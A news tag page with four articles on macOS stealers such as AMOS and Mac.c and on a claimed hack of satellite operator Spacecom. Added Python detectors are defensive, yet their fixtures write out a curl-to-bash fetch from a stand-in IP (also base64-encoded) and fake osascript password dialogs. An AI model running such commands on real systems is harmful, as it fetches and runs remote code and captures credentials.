Tag: AMOS

  • The Terminal Trap: How the “ClickFix” Scam Tricks Mac Users into Self-Infecting with Data-Stealing Malware

    macOS users are once again being lured with "simple fixes" for system optimization or disk cleanup, and following that advice can cost them their passwords, sensitive files, and cryptocurrency. Microsoft has warned of a new wave of the ClickFix campaign, in which attackers disguise malicious commands as harmless how-to instructions for Mac owners.

    The attackers spread these instructions through purpose-built websites, Medium blogs, and the Craft platform. The pages posed as ordinary troubleshooting guides and told users to copy a specific command into the Terminal and run it. In reality, the command downloaded and executed a malicious payload, installing stealers such as Macsync, Shub Stealer, AMOS, and other malware.

    Earlier attacks of this kind usually relied on .dmg disk images, which required the victim to mount the image and install the application by hand. The current approach is considerably more dangerous: the command runs directly in the Terminal, fetches a remote script, and executes it immediately. A script pulled down and run this way never receives the quarantine flag, so it sidesteps the Gatekeeper checks macOS applies to applications launched through the Finder.

    Once installed, the malware harvests browser credentials, macOS Keychain data, iCloud information, personal files, Telegram messages, and cryptocurrency wallet keys. In some cases it replaced the genuine Ledger Wallet, Trezor Suite, and Exodus applications with trojanized copies, so the victim kept working inside a compromised environment without noticing.

    Microsoft describes several variants of the attack. One first checked the keyboard layout and exited if it found Russian or another CIS layout. Another looked for a working command-and-control server and, if the primary hosts did not answer, tried to obtain a new address via Telegram. A third used "helper" or "update" files to look for virtual-machine artifacts and stopped in environments that resembled analysis sandboxes.

    For persistence, the attackers created macOS Launch Agents disguised as legitimate Google or Finder components. After a reboot the infected Mac reconnected to the attackers' server for further commands. The harvested data was archived and exfiltrated to a remote server, and temporary files were deleted to hinder forensic investigation.
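
    Both halves of the chain described above, the pasted curl-to-shell command and the Launch Agent that re-runs a command at login, can be checked with the same heuristics. The following is an added example written for this page, not code from Microsoft's report or from the malware: the regex patterns, the brand-word list and the three sample plists it writes to a temporary directory are the example's own constructions, and 203.0.113.10 is a documentation address, not a real C2.

```python
import base64
import plistlib
import re
import shlex
import tempfile
from pathlib import Path

# Heuristics for a Terminal one-liner (the ClickFix lure) or for the command a
# LaunchAgent re-runs at login. These patterns are this example's own choices,
# not Microsoft's detection logic and not Apple's Terminal paste warning.
SUSPICIOUS_PATTERNS = [
    (r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|k)?sh\b", "remote script piped straight into a shell"),
    (r"\bbase64\s+(-[dD]|--decode)\b", "base64-encoded payload decoded at run time"),
    (r"\b(ba|z)?sh\s+-c\s+['\"]", "command hidden inside sh -c / bash -c"),
    (r"\bosascript\b", "AppleScript run from the command line"),
    (r"\bxattr\b[^|;&]*com\.apple\.quarantine", "quarantine attribute removed (sidesteps Gatekeeper)"),
    (r"https?://\d{1,3}(\.\d{1,3}){3}\b", "download from a bare IP address"),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def classify_command(cmd: str, _depth: int = 0) -> list[str]:
    """Return the reasons a command line looks like a ClickFix lure (empty list = nothing found).
    Base64 blobs are decoded and re-scanned so an encoded curl|bash still shows up."""
    reasons = [why for pat, why in SUSPICIOUS_PATTERNS if re.search(pat, cmd, re.IGNORECASE)]
    if _depth < 2:
        for token in B64_TOKEN.findall(cmd):
            try:
                decoded = base64.b64decode(token, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # not base64, or not text: nothing to re-scan
            reasons += ["decoded payload: " + r for r in classify_command(decoded, _depth + 1)]
    return reasons


# Vendor words a stealer borrows for its Label. Genuine agents also use reverse-DNS
# vendor labels (e.g. com.google.keystone.agent), so a brand word only counts as a
# finding when the program it launches is itself suspicious.
BRAND_WORDS = re.compile(r"google|apple|finder|chrome", re.IGNORECASE)
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/Users/Shared/", "/var/folders/", "/Volumes/")


def audit_launch_agent(plist_bytes: bytes) -> list[str]:
    """Inspect one LaunchAgent plist (XML or binary) and return findings; empty = looks ordinary."""
    try:
        plist = plistlib.loads(plist_bytes)
    except plistlib.InvalidFileException:
        return ["plist does not parse"]
    argv = ([plist["Program"]] if plist.get("Program") else []) + list(plist.get("ProgramArguments") or [])
    cmdline = " ".join(shlex.quote(a) for a in argv)
    findings = classify_command(cmdline)
    if plist.get("RunAtLoad") and argv and argv[0].startswith(USER_WRITABLE):
        findings.append(f"RunAtLoad program lives in a user-writable location: {argv[0]}")
    label = plist.get("Label", "")
    if findings and BRAND_WORDS.search(label):
        findings.append(f"label {label!r} borrows a vendor name but runs a suspicious program")
    return findings


def scan_launch_agents(directory: Path) -> dict[str, list[str]]:
    """Audit every *.plist in a LaunchAgents directory; only entries with findings are returned."""
    report = {}
    for path in sorted(directory.glob("*.plist")):
        findings = audit_launch_agent(path.read_bytes())
        if findings:
            report[path.name] = findings
    return report


def build_demo_dir() -> Path:
    """Write three constructed plists (not real-world samples) into a temp directory."""
    d = Path(tempfile.mkdtemp(prefix="launchagents_demo_"))
    samples = {
        "com.example.backup.plist": {"Label": "com.example.backup", "RunAtLoad": True,
                                     "ProgramArguments": ["/usr/local/bin/backup", "--daily"]},
        "com.google.update.helper.plist": {"Label": "com.google.update.helper", "RunAtLoad": True,
                                           "ProgramArguments": ["/bin/bash", "-c",
                                                                "curl -fsSL http://203.0.113.10/update.sh | bash"]},
        "com.apple.finder.service.plist": {"Label": "com.apple.finder.service", "RunAtLoad": True,
                                           "Program": "/Users/Shared/.cache/helper"},
    }
    for name, content in samples.items():
        (d / name).write_bytes(plistlib.dumps(content))
    return d


# Encoded variant of the same lure, built at run time so the plaintext stays readable here.
DEMO_ENCODED_LURE = ("echo " + base64.b64encode(b"curl -fsSL http://203.0.113.10/update.sh | bash").decode()
                     + " | base64 -d | bash")

if __name__ == "__main__":
    for name, findings in scan_launch_agents(build_demo_dir()).items():
        print(name, *("  - " + f for f in findings), sep="\n")
    print(classify_command(DEMO_ENCODED_LURE))
```

    On a Mac, point scan_launch_agents() at ~/Library/LaunchAgents and /Library/LaunchAgents (or at a copy taken for forensics). Treat the output as triage rather than a verdict: legitimate agents also use RunAtLoad and vendor-named labels, which is why the label check only fires alongside another finding, and a stealer that persists via a Launch Daemon or a login item will not appear in these directories at all.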

    Apple responded by updating its XProtect signatures and, in macOS 26.4, added a dedicated warning for dangerous Terminal input. When a user tries to paste a suspicious command, the system intervenes with a notice that scammers often push such actions through websites, chats, apps, or phone calls.

    The basic advice is simple: do not paste commands into the Terminal from websites or forums unless you fully trust the source. To a non-expert the command looks like a meaningless string of characters; to an attacker it is a quick route to passwords, data, and money.

  • Pro-Iranian Handala Group Claims Cyberattack on Israeli Satellite Operator Spacecom

    Israeli satellite operator Spacecom, which manages the AMOS satellite fleet, has found itself in turmoil after the pro-Iranian group Handala claimed to have compromised its infrastructure. The hackers published a statement on their darknet blog, a platform they routinely use to release stolen data.

    According to the attackers, they allegedly gained access to the company’s ground stations and exfiltrated hundreds of gigabytes of information. However, subsequent analysis casts doubt on whether the intruders obtained data that could endanger satellite control.

    Spacecom, with revenues estimated at around 100 million dollars, provides telecommunications services for both civilian and military purposes across Europe, the Middle East, and other regions. The AMOS fleet underpins communications and broadcasting, including through AMOS-17, whose clients were referenced in the leaked documents.

    The hackers claimed to have stolen 379 gigabytes of data, including files purportedly collected from ground stations in multiple countries. They also released what they described as personnel-related records. Among the published materials were screenshots of nondisclosure agreements between Spacecom and its clients.

    Experts at Cybernews, who analyzed a demo archive of roughly 960 megabytes, identified navigation and observation files in RINEX format, the standard interchange format for GNSS receiver data. Such data can help track what the ground stations were observing, but it does not in itself allow anyone to interfere with satellite functions.

    Researchers noted that although the leak may contain material useful for phishing or other attacks targeting the company’s staff, there is no conclusive evidence of access to confidential systems governing satellite operations. Nevertheless, specialists advise Spacecom to promptly audit its infrastructure for vulnerabilities and close any potential security gaps.

    The Handala group is notorious for targeting Israeli and Western organizations. Its tactics resemble those of ransomware gangs, releasing data on its darknet site as leverage. Earlier this year, it also struck at Iran International, one of the few independent media outlets in Iran.

  • A New Mac Trojan Is on the Prowl, and It’s Cheaper Than Its Top Competitor

    A new macOS trojan, emerging on the dark web under the name Mac.c, is rapidly gaining popularity and beginning to compete with one of the underground market’s most notorious threats, AMOS. Analysts at Moonlock Lab were the first to draw attention to this tool, tracing its development by a hacker known as mentalpositive. Unlike many underground authors, he openly published updates and showcased the capabilities of his code on dark web forums — a move that quickly attracted buyers to the project.

    Mac.c was conceived as a streamlined alternative to AMOS, built for maximum speed in data exfiltration. The malware is capable of harvesting information from iCloud Keychain, stored browser passwords, cryptocurrency wallets, system metadata, and even documents from designated macOS directories. To achieve this, it leverages native macOS mechanisms — from AppleScript to standard APIs — enabling it to disguise itself as legitimate processes and bypass many antivirus solutions. Its discovered features include evasion of XProtect via unique build generation, a remote file grabber, and a phishing module for stealing Trezor seed phrases.

    Beyond its technical arsenal, the author invested in operator convenience. The administrative panel provides infection statistics, supports custom build generation, and enables attack management. As the project evolved, new integrations were introduced, including masquerading as Ledger Live, reducing binary size for faster delivery, and lowering detection rates during static analysis.

    The subscription price for Mac.c is $1,500 per month, with a standalone Trezor data theft module offered for $1,000. By comparison, AMOS costs at least $3,000 monthly, making Mac.c significantly more accessible — especially to less experienced or financially constrained cybercriminals, including so-called “traffers” who spread malware through phishing and malvertising campaigns.

    Moonlock Lab confirmed the full functionality of Mac.c, having detected its samples among CleanMyMac users. It spreads under the guise of installation files with names such as Installer.dmg or Installer descrakeador adobe.dmg, often pretending to be cracked versions of popular software. While CleanMyMac managed to block the threat, researchers emphasized that its detection highlights active distribution. A code comparison between Mac.c and AMOS revealed that some features were directly borrowed, suggesting possible ties between the developers.

    The attack chain relies heavily on social engineering: the victim downloads and launches a malicious file, triggering the first stage of the trojan. It then deploys AppleScript to search for sensitive data and spawns counterfeit system windows requesting a password. The credentials entered by the user are stored in plaintext and later used for further exploitation of system resources.
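
    To show what that counterfeit password window looks like in process telemetry, here is an added detection example (not Moonlock's code and not the malware's). It scores osascript command lines from constructed key=value process events, weighting the `display dialog ... with hidden answer` construct, password wording and a system-sounding title, and adding a point when the parent process came from a mounted disk image or the user's home directory. The event layout, paths and dialog texts are invented for the demo.

```python
import re
from typing import Optional

# Constructed process-execution events in a generic key=value layout (not the format of
# any particular EDR). Paths and prompt texts are invented; pid 4104 echoes the
# "save game files" pretext described for the Innocent Witches module.
SAMPLE_EVENTS = [
    'pid=4101 parent=/usr/libexec/xpcproxy image=/usr/bin/osascript '
    'args=osascript -e \'display notification "Backup finished" with title "Backup"\'',
    'pid=4102 parent=/Volumes/Installer/Installer.app/Contents/MacOS/Installer image=/usr/bin/osascript '
    'args=osascript -e \'display dialog "macOS needs your password to finish installing" '
    'default answer "" with hidden answer with icon caution with title "System Preferences"\'',
    'pid=4103 parent=/Users/alice/scripts/deploy.sh image=/usr/bin/osascript '
    'args=osascript -e \'do shell script "installer -pkg /tmp/app.pkg -target /" with administrator privileges\'',
    'pid=4104 parent=/Users/alice/Downloads/Innocent Witches.app/Contents/MacOS/game image=/usr/bin/osascript '
    'args=osascript -e \'display dialog "Enter your password to save game files" '
    'default answer "" with hidden answer with title "Finder"\'',
]

EVENT_RE = re.compile(r"pid=(\d+) parent=(.+?) image=(\S+) args=(.*)")

# Each rule: (pattern, weight, reason). "with administrator privileges" is deliberately
# not scored: that keyword brings up the system's own authentication dialog and the
# password never reaches the script, whereas "with hidden answer" hands the typed text back.
RULES = [
    (re.compile(r"display dialog", re.I), 1, "script builds its own dialog box"),
    (re.compile(r"with hidden answer", re.I), 3, "masked input field returns the typed secret to the script"),
    (re.compile(r"password|passcode|keychain|credential", re.I), 2, "prompt text asks for a password"),
    (re.compile(r'with title\s+"(System Preferences|System Settings|Finder|Keychain Access|macOS|Apple)', re.I),
     2, "dialog title impersonates a system component"),
]
UNTRUSTED_PARENTS = ("/Volumes/", "/Users/", "/tmp/", "/private/tmp/")
THRESHOLD = 5  # a hidden-answer field plus password wording is enough on its own


def score_event(line: str) -> Optional[dict]:
    """Score one osascript execution; None for non-osascript events or lines that do not parse."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    pid, parent, image, args = m.groups()
    if not image.endswith("/osascript"):
        return None
    score, reasons = 0, []
    for pattern, weight, reason in RULES:
        if pattern.search(args):
            score += weight
            reasons.append(reason)
    if parent.startswith(UNTRUSTED_PARENTS):
        score += 1
        reasons.append(f"launched from a user-controlled path: {parent}")
    return {"pid": pid, "parent": parent, "score": score, "reasons": reasons}


def detect_credential_prompts(lines) -> list[dict]:
    """Return the events that look like a fake macOS password prompt, highest score first."""
    hits = [e for e in map(score_event, lines) if e and e["score"] >= THRESHOLD]
    return sorted(hits, key=lambda e: (-e["score"], e["pid"]))


if __name__ == "__main__":
    for hit in detect_credential_prompts(SAMPLE_EVENTS):
        print(f"pid {hit['pid']} score {hit['score']}: {'; '.join(hit['reasons'])}")
```

    The rule worth remembering is the one that is deliberately missing: an AppleScript that elevates with `do shell script ... with administrator privileges` gets the genuine system authentication sheet and never sees the password, so it scores nothing here even though it also asks for credentials. A stealer cannot use that path, because it wants the plaintext, which is exactly what `display dialog ... with hidden answer` returns to the script.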

    The malware harvests cookies, logins, and IndexedDB contents from browsers such as Chrome, Edge, Brave, and Yandex. While Safari is not yet supported, the list of targeted applications is expanding. Mac.c places particular emphasis on cryptocurrency wallets, extracting data from MetaMask, Phantom, Binance Wallet, Electrum, Exodus, Atomic, Monero, Wasabi, and Ledger Live. An additional module even masquerades as the game Innocent Witches, prompting users for a password to “save files,” which instead redirects them to a phishing site (innocentwitches[.]top).

    Although Mac.c does not yet match the sophistication of AMOS, its lower cost and ease of use make it an especially dangerous threat. Moonlock Lab predicts its popularity will continue to grow, with future versions likely to incorporate expanded capabilities. Against the backdrop of rising attacks on cryptocurrency holders, Mac.c lowers the barrier to entry for a wider pool of cybercriminals seeking to profit from the theft of digital assets.

    For protection, researchers advise downloading applications exclusively from trusted sources, avoiding suspicious links, keeping macOS updated, and deploying specialized security tools. Cryptocurrency holders are urged to store keys and assets on hardware wallets or in secured applications rather than within browsers.

    Mac.c serves as a stark reminder that macOS can no longer be considered an invulnerable system. With active backing from the dark web community and a comparatively modest price, it may fuel a new wave of cyberattacks — with digital currencies once again as the prime target.

  • Atomic Stealer Malware Now Targets Mac Users Through Fake Browser Updates

    Atomic Stealer, also known as AMOS, is a popular stealer for macOS. In September, security researchers from Malwarebytes described how malicious ads were tricking victims into downloading this piece of malware under the disguise of a popular application.

    Now AMOS is being delivered to Mac users through a fake browser update chain tracked as 'ClearFake'. Initially aimed mainly at Windows users, ClearFake has extended its reach to macOS, and this may well be the first time one of the main social engineering campaigns has branched out not only geographically but across operating systems.

    ClearFake operates by leveraging compromised websites to distribute phony browser updates. Discovered by Randy McEoin in August, this campaign has undergone several enhancements, including the adoption of smart contracts for its redirect mechanism. It has quickly become one of the most prevalent and dangerous social engineering schemes.

    On November 17, security researcher Ankit Anubhav noted that Mac users were now being targeted by ClearFake, with a tailored payload. This payload, a DMG file posing as a Safari or Chrome update, is crafted to deceive Mac users. Once the file is opened, and administrative permissions granted, it executes commands that enable the theft of passwords and files.

    ClearFake employs a high level of deception, using templates that mimic official websites. For Safari, the template closely resembles Apple’s official site, available in various languages. For Google Chrome users on Mac, the template is akin to the one used for Windows users, maintaining a consistent deceptive appearance.


    An analysis of the malicious application reveals strings that indicate its capabilities, including password and file grabbing. Additionally, the malware’s command and control server, where the stolen data is sent, can be identified within the same file.
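
    A quick way to see those capability strings and the C2 address for yourself is a strings pass over the binary. The following added example (not Malwarebytes' analysis tooling) builds a constructed stand-in for the Mach-O, extracts printable runs the way the `strings` utility does, pulls out URLs and defangs them, and buckets paths that hint at Keychain, browser, wallet and staging access. The marker lists and the 203.0.113.50 address are the example's own choices.

```python
import random
import re

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[\x21-\x7e]*)?")

# Substring markers grouped by the capability they suggest. These are this example's
# picks for macOS stealer triage; a real sample's strings will differ.
CAPABILITY_MARKERS = {
    "keychain": ("login.keychain", "find-generic-password", "/Keychains/"),
    "browser": ("Login Data", "Cookies", "Web Data", "Local Extension Settings"),
    "wallet": ("Exodus", "Electrum", "Ledger", "MetaMask", "wallet.dat"),
    "staging": ("zip -r", "ditto -c", "/tmp/"),
}


def extract_strings(blob: bytes, min_len: int = 6) -> list[str]:
    """ASCII `strings`: every run of printable bytes at least min_len long, in file order."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def defang(url: str) -> str:
    """Make an indicator safe to paste into a report (203.0.113.50 -> 203[.]0[.]113[.]50)."""
    return url.replace(".", "[.]")


def triage(strings: list[str]) -> dict[str, list[str]]:
    """Bucket extracted strings into C2 indicators and capability hints; everything else is dropped."""
    report = {"c2": [], **{cap: [] for cap in CAPABILITY_MARKERS}}
    for s in strings:
        for url in URL_RE.findall(s):
            report["c2"].append(defang(url))
        for cap, markers in CAPABILITY_MARKERS.items():
            if any(mk.lower() in s.lower() for mk in markers) and s not in report[cap]:
                report[cap].append(s)
    return report


def build_sample_binary() -> bytes:
    """Constructed stand-in for a stealer Mach-O (not a real sample): high-bit filler bytes,
    which never count as printable, around the kind of strings triage looks for."""
    rng = random.Random(2024)

    def filler(n: int) -> bytes:
        return bytes(rng.randrange(0x80, 0x100) for _ in range(n))

    embedded = [
        b"__PAGEZERO", b"__TEXT",                       # ordinary Mach-O segment names
        b"/Library/Keychains/login.keychain-db",
        b"security find-generic-password",
        b"Library/Application Support/Google/Chrome/Default/Login Data",
        b"Library/Application Support/Exodus/exodus.wallet",
        b"https://203.0.113.50/gate/collect",         # documentation address, not a real C2
        b"zip -r /tmp/out.zip /tmp/collect",
    ]
    blob = b""
    for s in embedded:
        blob += filler(rng.randrange(8, 40)) + s + b"\x00"
    return blob + filler(32)


if __name__ == "__main__":
    for bucket, hits in triage(extract_strings(build_sample_binary())).items():
        print(bucket, *("  " + h for h in hits), sep="\n")
```

    On a real file, pass Path(sample).read_bytes() to extract_strings(); for a .dmg, mount it or extract it first and run the pass over the app's Contents/MacOS binary. A packed or string-encrypted sample will yield little, so an empty report means "look harder", not "clean".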

    Historically, fake browser updates have predominantly been a threat to Windows users. However, the popularity of stealers like AMOS has made it easier for threat actors to adapt payloads to other operating systems, including macOS. This shift widens the threat landscape for Mac users, who may previously have considered their systems less susceptible to such attacks.

    Given the rise of ClearFake as a primary social engineering campaign, Mac users are advised to exercise increased vigilance. Malwarebytes recommends the use of web protection tools to block the malicious infrastructure associated with this threat actor. As the tactics of cybercriminals evolve, staying informed and employing robust cybersecurity measures are key to safeguarding against such sophisticated threats.